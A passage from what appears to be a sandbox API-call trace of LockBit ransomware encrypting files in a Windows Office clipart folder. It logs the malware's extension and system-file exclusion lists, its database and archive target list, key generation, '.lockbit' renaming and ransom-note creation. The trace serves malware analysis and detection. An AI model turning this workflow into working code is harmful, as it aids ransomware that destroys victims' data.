lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.103] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.103] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02470U.BMP.lockbit") returned 72 [0169.103] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02470U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02470u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.111] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.111] malloc (_Size=0x40068) returned 0x1ff1e60 [0169.111] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=18684) returned 1 [0169.111] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.111] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0169.111] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.112] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0169.112] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.114] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02470U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02470U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.114] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.114] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.115] free (_Block=0x1fa2ed8) [0169.115] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02470U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.115] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.115] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.115] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7a0bb00, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7a0bb00, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02503U.BMP", cAlternateFileName="")) returned 1 [0169.115] lstrcmpiW (lpString1=".", lpString2="PH02503U.BMP") returned -1 [0169.115] lstrcmpiW (lpString1="..", lpString2="PH02503U.BMP") returned -1 [0169.115] PathFindExtensionW (pszPath="PH02503U.BMP") returned=".BMP" [0169.116] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.116] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.116] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.116] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.116] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.116] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.117] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.117] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02503U.BMP") returned 1 [0169.117] lstrcmpiW (lpString1="ntldr", lpString2="PH02503U.BMP") returned -1 [0169.117] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02503U.BMP") returned -1 [0169.117] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02503U.BMP") returned -1 [0169.117] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02503U.BMP") returned -1 [0169.118] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02503U.BMP") returned 1 [0169.118] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02503U.BMP") returned -1 [0169.118] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.118] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02503U.BMP") returned=".BMP" [0169.118] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.118] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.118] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.119] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.119] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.119] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.119] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.119] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.119] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.119] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02503U.BMP.lockbit") returned 72 [0169.119] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02503U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02503u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.124] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.124] malloc (_Size=0x40068) returned 0x3df0008 [0169.124] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31968) returned 1 [0169.124] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.125] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.125] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.125] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.127] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02503U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02503U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.127] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.127] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.128] free (_Block=0x1fa2ed8) [0169.128] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02503U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.128] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.128] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.128] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83b1e300, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83b1e300, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0x8499, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02567J.JPG", cAlternateFileName="")) returned 1 [0169.128] lstrcmpiW (lpString1=".", lpString2="PH02567J.JPG") returned -1 [0169.128] lstrcmpiW (lpString1="..", lpString2="PH02567J.JPG") returned -1 [0169.128] PathFindExtensionW (pszPath="PH02567J.JPG") returned=".JPG" [0169.128] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0169.128] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0169.128] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0169.128] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0169.129] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0169.129] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0169.130] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0169.130] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0169.130] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0169.130] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0169.130] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0169.130] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0169.130] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02567J.JPG") returned 1 [0169.130] lstrcmpiW (lpString1="ntldr", lpString2="PH02567J.JPG") returned -1 [0169.130] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02567J.JPG") returned -1 [0169.130] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02567J.JPG") returned -1 [0169.130] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02567J.JPG") returned -1 [0169.130] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02567J.JPG") returned 1 [0169.130] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02567J.JPG") returned -1 [0169.130] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.130] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG") returned=".JPG" [0169.131] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0169.131] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0169.131] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0169.132] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0169.132] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG.lockbit") returned 72 [0169.132] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02567j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0169.132] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.133] malloc (_Size=0x40068) returned 0x1ff1e60 [0169.133] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=33945) returned 1 [0169.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.133] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0169.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0169.134] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.432] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.432] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.435] free (_Block=0x1fa2ed8) [0169.435] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.435] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.435] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.435] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd929e00, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd929e00, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x639b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02736G.GIF", cAlternateFileName="")) returned 1 [0169.436] lstrcmpiW (lpString1=".", lpString2="PH02736G.GIF") returned -1 [0169.436] lstrcmpiW (lpString1="..", lpString2="PH02736G.GIF") returned -1 [0169.436] PathFindExtensionW (pszPath="PH02736G.GIF") returned=".GIF" [0169.436] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0169.436] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0169.436] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0169.436] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0169.436] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0169.436] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0169.436] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0169.436] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0169.436] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0169.436] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0169.436] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0169.436] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0169.436] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0169.436] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0169.436] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0169.436] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0169.436] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0169.437] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0169.437] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0169.437] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0169.437] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".msc", 